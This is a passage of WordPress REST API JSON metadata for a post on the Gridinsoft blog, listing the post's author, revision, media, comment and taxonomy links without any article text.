Zimmermann","author_link":"https:\/\/gridinsoft.com\/blogs\/author\/daniel\/"},"_links":{"self":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/30605","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/users\/14"}],"replies":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/comments?post=30605"}],"version-history":[{"count":29,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/30605\/revisions"}],"predecessor-version":[{"id":30715,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/posts\/30605\/revisions\/30715"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media\/30624"}],"wp:attachment":[{"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/media?parent=30605"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/categories?post=30605"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/gridinsoft.com\/blogs\/wp-json\/wp\/v2\/tags?post=30605"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}